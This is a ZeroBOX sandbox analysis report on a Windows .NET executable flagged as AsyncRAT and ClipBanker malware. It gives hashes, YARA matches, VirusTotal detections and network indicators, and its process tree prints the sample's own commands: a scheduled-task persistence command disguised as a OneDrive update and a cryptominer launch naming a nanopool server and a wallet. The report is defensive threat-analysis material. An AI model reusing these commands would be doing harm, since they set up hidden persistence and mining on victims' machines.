Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 15, 2021, 1:44 p.m.	Sept. 15, 2021, 1:49 p.m.

Size	10.9MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`fa0c8c44a1586d075fe128e07844ef1d`
SHA256	`535624832e774227fd956fb64eab587486e29548620b802a0e355a6c4eae6f45`
CRC32	`AAB2F9A5`
ssdeep	`196608:Q2mkb8h1vVa7KSMEjSURy2Vg2Exdk7MG670uF+0ip1+OkLVDcdjO/R6KbhdPRgC:Z41NSMEOURPHExSM0n1+OkLIjO/Rp9kC`
Yara	Malicious_Packer_Zero - Malicious Packer UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check Is_DotNET_EXE - (no description) Malicious_Library_Zero - Malicious_Library Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

schtasks.exe "schtasks.exe" /create /tn OneDriveStandalone-API-Method-Update-8-7736888177-3994777-719430009-19199 /tr "C:\Users\test22\AppData\Roaming\Audio API MMS\C4E07DBC61\OneDriveStandaloneAPIMethod.exe" /st 19:12 /du 23:59 /sc daily /ri 1 /f
604
cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\tmp2CB1.tmp.bat""
192
- timeout.exe timeout 4
  1868
RtkNGuigpuAPI.exe "C:\Users\test22\AppData\Roaming\Microsoft\C4E07DBC61G\RtkNGuigpuAPI.exe" -pool eth-eu2.nanopool.org:9999 -wal 0xd079a4aa3eaca2191e0dd013265216a56b0161fb - worker C4E07DBC61 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 95 -tstart 90 -coin eth
1052

Name	Response	Post-Analysis Lookup
api.telegram.org	A 149.154.167.220	149.154.167.220

IP Address	Status	Action
149.154.167.220	Active	Moloch
164.124.101.2	Active	Moloch
185.92.150.213	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 149.154.167.220:443 -> 192.168.56.101:49202	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49202 -> 149.154.167.220:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 15, 2021, 1:47 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 15, 2021, 1:47 p.m.	buffer: The batch file cannot be found. console_handle: 0x0000000b	1	1	0

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\Audio API MMS\C4E07DBC61\OneDriveStandaloneAPIMethod.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\test3.exe
file	C:\Users\test22\AppData\Roaming\Audio API MMS\C4E07DBC61\OneDriveStandaloneAPIMethod.exe

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00aedc00', u'virtual_address': u'0x00002000', u'entropy': 7.664112391051903, u'name': u'.text', u'virtual_size': u'0x00aedb34'}

entropy

7.66411239105

description

A section with a high entropy has been found

entropy

0.999821316894

description

Overall entropy of this PE file is high

Yara rule detected in process memory (31 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Detection of Virtual Appliances through the use of WMI for use of evasion.	rule	WMI_VM_Detect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Communicates with host for which no DNS query was performed (1 event)

host

185.92.150.213

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 192 resumed a thread in remote process 2368
NtResumeThread Sept. 15, 2021, 1:47 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2368	1	0	0

File has been identified by 32 AntiVirus engines on VirusTotal as malicious (32 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	IL:Trojan.MSILZilla.2050
ALYac	IL:Trojan.MSILZilla.2050
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Cybereason	malicious.371b01
Arcabit	IL:Trojan.MSILZilla.D802
Cyren	W32/MSIL_Agent.BTI.gen!Eldorado
ESET-NOD32	a variant of MSIL/Agent.CFW
APEX	Malicious
ClamAV	Win.Packed.AsyncRAT-9856570-1
Kaspersky	HEUR:Trojan-Banker.MSIL.ClipBanker.gen
BitDefender	IL:Trojan.MSILZilla.2050
Avast	Win32:RATX-gen [Trj]
Ad-Aware	IL:Trojan.MSILZilla.2050
DrWeb	BackDoor.AsyncRATNET.1
McAfee-GW-Edition	BehavesLike.Win32.Generic.vc
FireEye	Generic.mg.fa0c8c44a1586d07
Emsisoft	IL:Trojan.MSILZilla.2050 (B)
SentinelOne	Static AI - Malicious PE
Avira	HEUR/AGEN.1138205
MAX	malware (ai score=89)
Microsoft	Trojan:MSIL/ClipBanker.GF!MTB
ZoneAlarm	HEUR:Trojan-Banker.MSIL.ClipBanker.gen
GData	IL:Trojan.MSILZilla.2050
Cynet	Malicious (score: 99)
McAfee	Artemis!FA0C8C44A158
Rising	Spyware.ClipBanker!1.B627 (CLASSIC)
BitDefenderTheta	Gen:NN.ZemsilF.34142.@p0@a8bHxoi
AVG	Win32:RATX-gen [Trj]
Panda	Trj/GdSda.A
MaxSecure	Trojan.Malware.300983.susgen

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 events)

dead_host	185.92.150.213:6606
dead_host	192.168.56.101:49212
dead_host	192.168.56.101:49213

test3.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All